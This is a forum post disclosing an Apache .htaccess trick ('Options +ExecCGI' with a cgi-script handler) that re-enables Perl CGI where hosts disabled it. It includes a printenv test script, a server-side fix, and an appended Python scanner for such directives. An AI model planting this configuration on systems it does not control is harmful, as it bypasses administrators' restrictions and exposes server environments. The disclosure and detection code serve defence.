Have you disabled CGI for your users?
But you can still execute Perl scripts.

Are you amazed?
I am not.

This is a common .htaccess exploit.

Have fun with this:
.htaccess
Code: 
Options +ExecCGI
<FilesMatch \.pl$>
SetHandler cgi-script
</FilesMatch>
test.pl - Windows version
Code: 
#!c:/perl/bin/perl.exe
##
##  printenv -- demo CGI program which just prints its environment
##

print "Content-type: text/plain; charset=iso-8859-1\n\n";
foreach $var (sort(keys(%ENV))) {
    $val = $ENV{$var};
    $val =~ s|\n|\\n|g;
    $val =~ s|"|\\"|g;
    print "${var}=\"${val}\"\n";
}
test.pl - Linux version
Code: 
#!/usr/bin/perl
##
##  printenv -- demo CGI program which just prints its environment
##

print "Content-type: text/plain; charset=iso-8859-1\n\n";
foreach $var (sort(keys(%ENV))) {
    $val = $ENV{$var};
    $val =~ s|\n|\\n|g;
    $val =~ s|"|\\"|g;
    print "${var}=\"${val}\"\n";
}
And this is how to fix it (Apache configuration for the directory):
Code: 
Options Indexes FollowSymLinks
AllowOverride All Options=IncludesNOEXEC,Indexes,FollowSymLinks
Update: changing Options may cause 500 errors; changing AllowOverride should still give some lower protection.

Thanks to CVE-2009-1195 for the idea.

For details about the configurations see:
https://httpd.apache.org/docs/curren...#allowoverride
https://httpd.apache.org/docs/curren...e.html#options

Be aware that this thread was edited with a better configuration to avoid 500 errors with legitimate .htaccess edits.

If you face any errors with a certain .htaccess that you think is legitimate, reply here. Thanks.
NewEraCracker
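A defender-side check for the issue in this post, as an added example that is not part of the original post: it scans .htaccess files for the directives shown above that switch on CGI execution (`Options` enabling ExecCGI, and `SetHandler`/`AddHandler` mapping files to `cgi-script`). The function names and the sample text are assumptions made for this illustration.

```python
import os
import re

# Directives a user-controlled .htaccess can use to turn files into CGI programs.
HANDLER_RE = re.compile(r'^(SetHandler|AddHandler)\s+"?cgi-script"?(\s|$)', re.I)
OPTIONS_RE = re.compile(r'^Options\s+(.*)$', re.I)

SAMPLE = """\
# constructed sample: the .htaccess shown in the post
Options +ExecCGI
<FilesMatch \\.pl$>
SetHandler cgi-script
</FilesMatch>
"""

def logical_lines(text):
    """Yield (first_line_no, text), joining backslash-continued lines as Apache does."""
    buf, start = "", None
    for n, raw in enumerate(text.splitlines(), 1):
        start = start or n
        if raw.endswith("\\"):
            buf += raw[:-1] + " "
            continue
        yield start, (buf + raw).strip()
        buf, start = "", None
    if buf:
        yield start, buf.strip()

def audit_htaccess(text):
    """Return (line_no, finding) for each directive that switches on CGI execution."""
    findings = []
    for n, line in logical_lines(text):
        # Comment lines start with '#' and so match neither pattern.
        if HANDLER_RE.match(line):
            findings.append((n, "maps files to the cgi-script handler"))
        m = OPTIONS_RE.match(line)
        if m and {o.lower().lstrip("+") for o in m.group(1).split()} & {"execcgi", "all"}:
            findings.append((n, "enables ExecCGI"))
    return findings

def scan_tree(root):
    """Audit every .htaccess below root; return {path: findings} for files with hits."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, encoding="utf-8", errors="replace") as fh:
                report[path] = audit_htaccess(fh.read())
    return {p: hits for p, hits in report.items() if hits}
```

Run `scan_tree()` over the customers' document roots; a hit means the file asks for CGI execution, and whether Apache honours it depends on the AllowOverride setting for that directory.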